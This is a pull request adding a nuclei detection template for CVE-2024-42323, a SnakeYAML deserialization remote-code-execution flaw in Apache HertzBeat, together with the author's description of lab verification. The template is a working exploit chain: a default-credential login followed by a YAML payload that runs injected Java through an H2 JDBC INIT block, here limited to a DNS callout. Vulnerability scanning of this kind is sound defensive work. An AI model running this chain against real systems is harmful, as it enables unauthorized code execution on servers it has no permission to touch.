### PR TITLE
Add CVE-2024-42323 - Apache HertzBeat SnakeYAML deserialization RCE

### DIFF
--- a/http/cves/2024/CVE-2024-42323.yaml
+++ b/http/cves/2024/CVE-2024-42323.yaml
@@ -27,7 +27,7 @@ info:
     product: hertzbeat
     shodan-query: http.title:"HertzBeat"
     fofa-query: title="HertzBeat"
-  tags: cve,cve2024,apache,hertzbeat,snakeyaml,deserialization,rce,intrusive,authentication
+  tags: cve,cve2024,apache,hertzbeat,snakeyaml,deserialization,rce,intrusive,authenticated
 
 flow: http(1) && http(2)
 

--- a/http/cves/2024/CVE-2024-42323.yaml
+++ b/http/cves/2024/CVE-2024-42323.yaml
@@ -27,11 +27,7 @@ info:
     product: hertzbeat
     shodan-query: http.title:"HertzBeat"
     fofa-query: title="HertzBeat"
-  tags: cve,cve2024,apache,hertzbeat,snakeyaml,deserialization,rce,intrusive
-
-variables:
-  username: admin
-  password: hertzbeat
+  tags: cve,cve2024,apache,hertzbeat,snakeyaml,deserialization,rce,intrusive,authentication
 
 flow: http(1) && http(2)
 
@@ -56,14 +52,14 @@ http:
         POST /api/monitors/import HTTP/1.1
         Host: {{Hostname}}
         Authorization: Bearer {{token}}
-        Content-Type: multipart/form-data; boundary=----nucleiboundary
+        Content-Type: multipart/form-data; boundary=----testingboundary
 
-        ------nucleiboundary
+        ------testingboundary
         Content-Disposition: form-data; name="file"; filename="poc.yaml"
         Content-Type: application/octet-stream
 
         !!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:{{rand_text_alpha(8)}};MODE=MSSQLServer;INIT=drop alias if exists lk\\;CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName(\"{{interactsh-url}}\")\\; }$$\\;CALL LK ()\\;", [], "a", "b", false ]
-        ------nucleiboundary--
+        ------testingboundary--
 
     matchers:
       - type: word

--- a/http/cves/2024/CVE-2024-42323.yaml
+++ b/http/cves/2024/CVE-2024-42323.yaml
@@ -1,0 +1,72 @@
+id: CVE-2024-42323
+
+info:
+  name: Apache HertzBeat < 1.6.0 - SnakeYAML Deserialization Remote Code Execution
+  author: ChrisJr404
+  severity: high
+  description: |
+    Apache HertzBeat versions before 1.6.0 use a vulnerable version of the SnakeYAML library to parse YAML files imported through the `/api/monitors/import` and `/api/alert/defines/import` endpoints. An authenticated user can submit a YAML file that constructs an `org.h2.jdbc.JdbcConnection` with a malicious H2 in-memory JDBC URL whose `INIT` block contains a `CREATE ALIAS ... $$ ... $$` Java source snippet, achieving remote code execution inside the HertzBeat JVM. The vulnerability is exploitable in default deployments because the official Docker image and quickstart documentation ship with the well-known default credentials `admin:hertzbeat`, which the template uses for chained authentication.
+  impact: |
+    Authenticated remote code execution inside the HertzBeat JVM. Default-credential deployments collapse this into pre-auth RCE.
+  remediation: |
+    Upgrade to Apache HertzBeat 1.6.0 or later. Change the default `admin:hertzbeat` credentials in any deployment that has not already done so.
+  reference:
+    - https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-42323
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2024-42323
+    cwe-id: CWE-502
+    epss-score: 0.75553
+    epss-percentile: 0.98911
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: apache
+    product: hertzbeat
+    shodan-query: http.title:"HertzBeat"
+    fofa-query: title="HertzBeat"
+  tags: cve,cve2024,apache,hertzbeat,snakeyaml,deserialization,rce,intrusive
+
+variables:
+  username: admin
+  password: hertzbeat
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /api/account/auth/form HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"identifier":"{{username}}","credential":"{{password}}","type":0}
+
+    extractors:
+      - type: json
+        name: token
+        json:
+          - ".data.token"
+        internal: true
+
+  - raw:
+      - |
+        POST /api/monitors/import HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Content-Type: multipart/form-data; boundary=----nucleiboundary
+
+        ------nucleiboundary
+        Content-Disposition: form-data; name="file"; filename="poc.yaml"
+        Content-Type: application/octet-stream
+
+        !!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:{{rand_text_alpha(8)}};MODE=MSSQLServer;INIT=drop alias if exists lk\\;CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName(\"{{interactsh-url}}\")\\; }$$\\;CALL LK ()\\;", [], "a", "b", false ]
+        ------nucleiboundary--
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"


### PR DESCRIPTION
### Summary
Adds a verified template for **CVE-2024-42323** — Apache HertzBeat versions before 1.6.0 use a vulnerable version of SnakeYAML to parse YAML files imported via `/api/monitors/import` and `/api/alert/defines/import`. An authenticated user (default-credential `admin:hertzbeat` deployments are common) can submit a YAML file that constructs an `org.h2.jdbc.JdbcConnection` whose `INIT` parameter contains a `CREATE ALIAS ... $$ ... $$` Java source block, achieving remote code execution inside the HertzBeat JVM.

References:
- https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx
- https://nvd.nist.gov/vuln/detail/CVE-2024-42323

### Detection logic — non-destructive OOB DNS proof
Two-step `flow: http(1) && http(2)` template:

1. **Login** with the well-known default credentials `admin:hertzbeat` against `/api/account/auth/form`. Extract the JWT bearer token from `.data.token` of the JSON response.
2. **Import** a multipart YAML file containing `!!org.h2.jdbc.JdbcConnection [...]` whose JDBC URL `INIT` block creates a `LK` alias backed by `java.net.InetAddress.getByName(\"{{interactsh-url}}\")` and immediately calls it.

When the target is vulnerable, SnakeYAML constructs the `JdbcConnection`, H2 evaluates the URL, the alias is created and called, and the JVM emits a DNS A query for the unique `{{interactsh-url}}`. The match condition is `interactsh_protocol == \"dns\"` — the DNS callback itself is the proof of arbitrary Java code execution under attacker control.

The H2 alias body uses `InetAddress.getByName(...)` rather than `Runtime.exec(...)`, so the exploit is non-destructive — no shell commands are run, no files written.

### Verification
Tested on a clean Kali host using the published vulhub image.

**Vulnerable target — match:**

`vulhub/hertzbeat:1.4.4` (from `vulhub/hertzbeat/CVE-2024-42323/`):
```
[INF] Using Interactsh Server: oast.me
[CVE-2024-42323] [http] [high] http://127.0.0.1:1157/api/monitors/import
[INF] Scan completed in 32.730s. 1 matches found.
```

The container's JVM emits the DNS A query for the unique nuclei-generated subdomain (independently observed via `tcpdump -i any 'port 53'` on the host, and via the interactsh server's recorded interaction).

The HTTP response itself is a 409 with body `class org.h2.jdbc.JdbcConnection cannot be cast to class java.util.List` — that's the post-deserialization cast failure in `YamlImExportServiceImpl.parseImport(YamlImExportServiceImpl.java:59)`, but the `JdbcConnection` constructor (which is what triggers the H2 INIT block and therefore the alias call) had already completed successfully. The DNS callback is the dispositive proof.

### Reproduction
```bash
git clone https://github.com/vulhub/vulhub.git
cd vulhub/hertzbeat/CVE-2024-42323
docker compose up -d
# wait ~30s for Spring to come up
nuclei -t http/cves/2024/CVE-2024-42323.yaml -u http://localhost:1157
```

### Notes
- The template authenticates with the documented default credentials. Deployments that have rotated these credentials will not match — that is the correct behavior, since the YAML deserialization issue requires authentication and the template is detecting the realistic exploitation path.
- The H2 in-memory database name is randomized per scan via `{{rand_text_alpha(8)}}` to avoid cross-scan state collisions.
- Standard nuclei `interactsh_protocol == dns` matcher pattern, as used in `http/cves/2024/CVE-2024-22319.yaml` and many other OOB templates.
- This template targets the `/api/monitors/import` endpoint; the same vulnerability is also exploitable via `/api/alert/defines/import` per the advisory.

### Template Type / Checklist
- [x] CVE template (http/cves/2024/)
- [x] Verified (`metadata.verified: true`)
- [x] Multi-step flow with token extraction (matches `tablepress`-style chain in CVE-2024-45293)
- [x] Non-destructive payload (DNS query only, no shell exec)
- [x] Validated with `nuclei -validate`
- [x] No real-world targets referenced